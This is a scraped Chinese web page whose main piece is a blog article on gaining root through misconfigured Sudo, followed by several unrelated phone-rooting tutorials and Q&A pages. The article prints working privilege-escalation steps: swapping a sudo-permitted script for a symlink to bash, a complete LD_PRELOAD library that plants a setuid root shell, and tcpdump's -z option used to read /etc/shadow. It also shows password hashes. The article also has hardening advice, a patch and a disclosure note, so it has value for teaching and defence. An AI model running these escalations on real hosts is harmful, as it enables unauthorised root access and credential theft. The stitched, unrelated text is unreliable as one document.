我是怎样通过Sudo获取root权限的 - 博客 - 伯乐在线
& 我是怎样通过Sudo获取root权限的
& 4.6K 阅读
在处理安全相关的事务中，我们经常会发现服务器配置了权限管理的软件Sudo。和其它软件一样，配置Sudo也必须遵循最小特权的原则，用户只能被授予尽可能最小的特权来运行一些必要的任务或操作。因此，为了安全地配置Sudo，普通用户的权限必须被严格限制，他们仅能靠提升后的权限（通常是root用户的权限）合法地执行一组命令。
在实际应用中，根据最小特权原则配置的Sudo并不多见；即便有，也往往存在些许漏洞，我们利用这些漏洞就可以获取root权限。这样的话，就完蛋了，我们可以为所欲为！
这篇文章旨在给出一些错误和不安全配置的例子，这些是我们在安全评估中见到的并对生产环境造成了一定影响的例子。同时也告诉大家如何让自己的团队更加轻松地应对这些问题。
不安全的文件系统权限
考虑下面我们虚拟的用户“appadmin”的Sudo配置：
[sudo] password for appadmin:
User appadmin may run the following commands on this host:
(root) /opt/Support/start.sh, (root) /opt/Support/stop.sh,
(root) /opt/Support/restart.sh, (root) /usr/sbin/lsof
目前看起来没什么问题。接着我们来看看以下脚本：
$ ls -l /opt/Support/
-rwxr-xr-x 1 root
3 14:06 restart.sh
-rwxr-xr-x 1 appadmin appadmin 53 Oct
3 14:03 start.sh
$ ls -ld /opt/Support
drwxr-xr-x 2 appadmin appadmin 4096 Oct
3 13:58 /opt/Support
这些文件和目录的权限没有问题吗？在这里，我们有几个选项来提升我们的权限：
创建一个不存在的文件“stop.sh”
更改已存在的文件“start.sh”
移动文件“restart.sh”并创建另一个同名的文件
下面是第三种做法的演示：
$ mv /opt/Support/restart.sh{,.bak}
$ ln -s /bin/bash /opt/Support/restart.sh
$ sudo /opt/Support/restart.sh
[sudo] password for appadmin:
uid=0(root) gid=0(root) groups=0(root)
Game?over!?:)
考虑下面我们的用户“monitor”的Sudo配置：
[sudo] password for monitor:
Matching Defaults entries for monitor on this host:
!env_reset
User monitor may run the following commands on this host:
(root) /etc/init.d/sshd
我们看到env_reset选项被禁用了！这就意味着我们可以更改我们被允许执行的命令的环境。根据Sudo版本的不同，我们可以通过传入环境变量来提升我们的权限，正如以下著名的漏洞那样：
LD_PRELOAD ( or )
同样需要知道的是，其它一些危险的环境变量也可能被我们滥用（PERL5OPT, PYTHONINSPECT 等等）。
应当指出，虽然，即使当env_reset被禁用，大多数危险的环境变量现在已经被Sudo根据默认的硬编码黑名单(hard-coded blacklist)删除了。使用root用户运行“sudo -V”查看“要删除的环境变量”这个黑名单。
不过，在版本低于1.8.5的Sudo中，我们发现通过命令行传递的环境变量不会被删除，尽管它们应该被删除。所以我们仍然可以利用和LD_PRELOAD类似的技术来提升我们的权限，下面给出了在最新版本的Red Hat企业版Linux 5.10系统中的例子（仅仅是少了最新的）。
$ rpm -q sudo
sudo-1.7.2p1-28.el5
$ cat & xoxo.c &&'LUL'
#include &unistd.h&
#include &stdlib.h&
void _init()
if (!geteuid()) {
unsetenv(&LD_PRELOAD&);
unlink(&/tmp/libxoxo.so.1.0&);
setgid(0);
setuid(0);
execl(&/bin/sh&,&sh&,&-c&,&cp /bin/bash /tmp/. chown 0:0 /tmp/. /bin/chmod +xs /tmp/.bash&,NULL);
$ gcc -o xoxo.o -c xoxo.c -fPIC
$ gcc -shared -Wl,-soname,libxoxo.so.1 -o /tmp/libxoxo.so.1.0 xoxo.o -nostartfiles
$ sudo LD_PRELOAD=/tmp/libxoxo.so.1.0 /etc/init.d/sshd blaaah
[sudo] password for monitor:
$ /tmp/.bash -p -c 'head -n 1 /etc/shadow'
uid=500(monitor) gid=500(monitor) euid=0(root) egid=0(root) groups=500(monitor)
root:$1$VjDVB93E$AUL2Mg1L2gH70HHxh2CEr/:99:7:::
这个Bug位于文件sudo-1.8.4p5/plugins/sudoers/env.c的第685行，该处一个boolean比较操作没有被正确地执行。下面的补丁修复了这个问题：
--- sudo-1.8.4p5/plugins/sudoers/env.c
04:37:01. +1100
+++ sudo-1.8.4p5-fixed/plugins/sudoers/env.c
10:36:14. +1100
@@ -682,7 +682,7 @@
okvar = matches_env_keep(*ep);
okvar = matches_env_delete(*ep) ==
if (okvar == false)
if (okvar == true)
okvar = matches_env_check(*ep) !=
if (okvar == false) {
在1.8.5版本的Sudo中，受影响的代码实际上被更改和清理掉了，以这种“悄无声息”的方式修复了存在的问题。结果就是，在1.8.5及以上版本中，通过命令行传递的环境变量也被清除了。
需要注意的是RHEL5.10系统仍然是脆弱的，因为它附带了版本（应用了先前的每一个安全补丁）。同样，RHEL从6.0到6.3兼容了一个1.7分支的版本。不过，RHEL6.4系统就要好一些，因为它附带了版本。
我们负责任地向供应商披露了这些安全问题，在一周之内，该漏洞被命名为，并公布了其中一些细节，同时发布了安全补丁。虽然为受其影响的发行版开发的安全更新还未发布，一个简单的解决措施是不要禁用env_reset选项，这是系统默认的。
Escape to shell
考虑下面我们的用户“john”的Sudo配置：
[sudo] password for john:
User john may run the following commands on this host:
(root) /usr/sbin/tcpdump
在这个例子中，john能够截获网络流量。这个任务本身对管理员来讲是完全合法的，那么会是什么出了问题呢？值得了解一下“-z postrotate -command”（在tcpdump 4.0.0版本中引入）这个选项：
$ echo $'id\ncat /etc/shadow' & /tmp/.test
$ chmod +x /tmp/.test
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
[sudo] password for john:
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
Maximum file limit reached: 1
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
root:$6$CnflBAm.SEqAN6Rz$rZhceJkWQlw1Dl1LaWltiT.cIhXyHtk5Ot2C7mMygrr7XBhJFzLkO8RKphzgowaYUMJHiO2MB9oBRCKFQAWoz0:99:7:::
bin:*:99:7:::
注意“Z-root”需要基于RedHat的发行版（Fedora，CentOs等），因为它们在处理存储文件之前要TcpDump包来删除root权限。
那么，你能做些什么以避免Sudo的滥用？确保要仔细检查每一个获取提升后的权限来运行的程序，它们有可能直接获得root权限（a nice # prompt）。比如说，像vi或者less这样的程序，允许用户调用任意的shell命令（带!或者类似的），应该用更安全的同类程序，rvim和cat来代替它们。
想实战一下？接下来有个挑战，找出如何弹出一个root shell的方法。这里至少有两种方法可供我们参考，不过其中一种要比另一种更具侵略性，可以影响到系统的完整性。你可以在评论中给出你的解决办法。为了不削减趣味性，我们会在几个星期之后公布我们的和最原始的解决方法。系统环境是一个标准的CentOS 6.5系统，仅按“默认”的方式安装了zip包。
$ cat /usr/local/bin/extract_docs.sh
#!/bin/bash
zip -U /root/original-docs.zip -O /var/lib/extracted-docs.zip &$@&
$ ls -ld /root/original-docs.zip /usr/local/bin/ /usr/local/bin/extract_docs.sh /var/lib/ /var/lib/extracted-docs.zip
ls: cannot access /root/original-docs.zip: Permission denied
drwxr-xr-x.
2 root root 4096 Mar 12 17:02 /usr/local/bin/
-rwxr-xr-x.
1 root root
80 Mar 12 17:02 /usr/local/bin/extract_docs.sh
drwxr-xr-x. 15 root root 4096 Mar 12 17:02 /var/lib/
-rw-r--r--.
1 root root
964 Mar 12 17:02 /var/lib/extracted-docs.zip
$ rpm -q zip
zip-3.0-1.el6.x86_64
[sudo] password for kevin:
Matching Defaults entries for kevin on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep=&COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS&, env_keep+=&MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE&, env_keep+=&LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES&, env_keep+=&LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE&, env_keep+=&LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY&,
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User kevin may run the following commands on this host:
(root) /usr/local/bin/extract_docs.sh
感谢阅读，现在把你的想法拿出来吧！
关于作者：
可能感兴趣的话题
为作者带来更多读者；为读者筛选优质内容；专注IT互联网。
最新评论（期待您也参与评论）
汇集优质的Python技术文章和资源。人生苦短，我用Python！
JavaScript, CSS, HTML5 这里有前端的技术干货！
关注安卓移动开发业界动态，分享技术文章和优秀工具资源。
关注iOS移动开发业界动态，分享技术文章和优秀工具资源。
关于伯乐在线博客
在这个信息爆炸的时代，人们已然被大量、快速并且简短的信息所包围。然而，我们相信：过多“快餐”式的阅读只会令人“虚胖”，缺乏实质的内涵。伯乐在线博客团队正试图以我们微薄的力量，把优秀的原创/译文分享给读者，做一个小而精的精选博客，为“快餐”添加一些“营养”元素。
欢迎关注更多频道
– 分享和发现有价值的内容与观点
– 为IT单身男女服务的征婚传播平台
– 优秀的工具资源导航
– 翻译传播优秀的外文文章
– 国内外的精选博客文章
– JavaScript, HTML5, CSS
– 专注Android技术分享
– 专注iOS技术分享
– 专注Java技术分享
– 专注Python技术分享
（加好友请注明来意）
网站使用问题
请在询问或者反馈
& 2015 伯乐在线
赞助云主机我的手机是华为C8650，怎样获得root权限？请详细介绍一下操作步骤。_百度知道
我的手机是华为C8650，怎样获得root权限？请详细介绍一下操作步骤。
recovery需要升级才可以，原机带的不可以用，容易刷死，升级以后刷root（就是获取最高权限），root以后才可以刷机了，C8650中文版REC.5.0.2.3.zip，这个是recovery的升级版本，再刷root，我的也是C8650前几天刚刷的机，我在 天翼圈
创卓网 翼23
这几个论坛上泡了两天才自己刷的机，具体的教程和各种刷机包在这些网站都有，希望对你有帮助
其他类似问题
为您推荐：
其他4条回答
这款手机是安桌2.3的系统吧,目前还没有能把2.3root的软件，你可以再等等。
一 是去找技术人员破解，一般要50元左右。二 自己用电脑解决。上机锋网，下载相关软件，如下载FascinateRoot软件和re管理器，z4root。多看看教程
网上有教程
需要连接电脑
论坛里有各种教程。。不同时期的同型号手机系统不一样。。像一些电信定制机非定制机什么的。。教程不一样。。用蘑菇云。。卓大师。。应用助手。。一般的机子都能root
您可能关注的推广
root权限的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁酷派大神X7 root教程_酷派大神X7获取root权限的方法
据说现在这个酷派大神X7手机的root已经被破解了，看到网上有人root成功的，所以在这里来说一下，现在这个手机的root软件还不是很多，不过大家可以先试试，相信以后会有新的root软件来更新，现在的新手都比较喜欢一键root，不喜欢太复杂的操作，下面就来给大家说说详细的root过程了，这个root教程也主要是借助于手机的和电脑来操作的，还有数据线，所以大这要做好准备工作然后再进行root操作系统了：
第一种root方法：
1：手机必须能正常的上网，最好是用wifi上网
2：手机进入酷管家-&设置（点击右上角小齿轮）-&关于：
3：连续三次点击界面版本号上侧的小图标进入酷管家应用：
4：勾选&我已经阅读&&，点击继续：
5：点击&开始ROOT&字样开始收集ROOT：
6：待手机完成Root包下载后，自动弹出重启升级的提示框。点击&马上重启&后，进入recovery模式安装Root包。
7：安装完Root包重启后，在此点击&关于&版本号上侧的小图标提示手机已经Root
下面是第二种root方法：
1：首先下载ROOT文件包，，下载下来放到电脑上进行解压，解压出来一个文件夹里，里面有三个文件，是咱们进行root的时候需要用到的。
2：先安装一键ROOT和busybox工具箱这两个软件，安装到手机里，切记那个授权管理不可安装。然后打开一键ROOT会检测ROOT权限，检测完毕，就会出现一键ROOT字样，点击一键ROOT。
3：然后等待3分钟左右，然后就会提示你ROOT成功，然后退出此软件，不要下载里面带的程序。
4：此时，你的手机桌面上是没有ROOT权限的，但是一键ROOT已经根据漏洞破解了，只是没有注入文件。这个时候来我们把第三个文件授权管理安装到的手机上，安装完毕，务必打开一下，确认有ROOT权限。
5：接下来，我们打开busybox工具箱，进入里面，此时授权管理会提示我们授予它权限，点击允许。
6：然后进入看到一大堆东西，不用管它，等待下面有个转动的圈完毕，点击Install,然后等待安装完毕，退出到进入界面，然后为了确保我们busybox命令集成正确，务必重新Install下，提示如图界面就可以（此项工作务必操作，否则你的手机重启后ROOT权限可能会异常消失）
7：最后，软件关闭，然后重启咱们的手机，重启后左下角会提示ROOT字样，进入主界面打开授权管理，发现ROOT权限没掉，那么恭喜你，已经成功ROOT本手机，尽情的享受玩机乐趣吧。
(本文来源) /a/jingpinshouji/040.html怎样才可以正确的获取手机中的ROOT权限_百度知道
怎样才可以正确的获取手机中的ROOT权限
可以使用root工具来获得也可以刷入其它拥有root权限的系统
其他类似问题
为您推荐：
其他2条回答
正确获取手机root权限的方法有很多你可以在电脑上下载应用宝来进行root将手机通过数据线连接上电脑之后打开手机的USB调试然后电脑就可以控制手机了再用工具箱里的一键root进行root根据提示进行操作后，很容易就成功了的这种方法既安全又方便，还是很简单的
下载root工具！
root权限的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁魅族MX如何获取root权限的方法
还有不少机友不知道魅族MX怎么获取root权限呢，主要是很多人想删除手机系统里自带的一些不用的软件，可是怎么也删除不了，后来才搞明白需要获取root权限才可以删除，下面就来说说这个手机怎么获取root权限吧。
一：准备工作：
1：下载附件魅族MX_ROOT.zip，， 下载下来之后并把它解压到电脑端
2：手机能用数据线正常的连接电脑
二：获取root权限的步骤：
1：手机打开USB调试模式，用USB线，使豌豆荚连接到魅族MX。关闭豌豆荚（进程完全退出）。（没别的意思，就是需要豌豆荚自动帮你安装MX的ADB驱动，如果之前已经安装ADB驱动，或者连接过豌豆荚，此步骤可略过）
2：手机保持USB调试模式打开状态，然后双击执行上面解压出来的&mxRoot.bat&文件
注意：如果你的是WIN 7操作系统，请用右键&管理员权限&执行它
3：之后一路回车，等待手机自动重启，完成魅族MX的永久root
注意：重启后，断开跟电脑连接，检查手机菜单里是否有superuser(授权管理)，有的话就ROOT成功了
4：ROOT成功了
注意：有人说用上面的方法不行，如果不行的话，你可以在直接在电脑上安装一个腾讯手机管家，然后用数据线连接腾讯手机管家，然后会提示你怎么进行roo，用这个软件也是很方便的。
点击查看更多
(本文来源) /a/jingpinshouji/900.html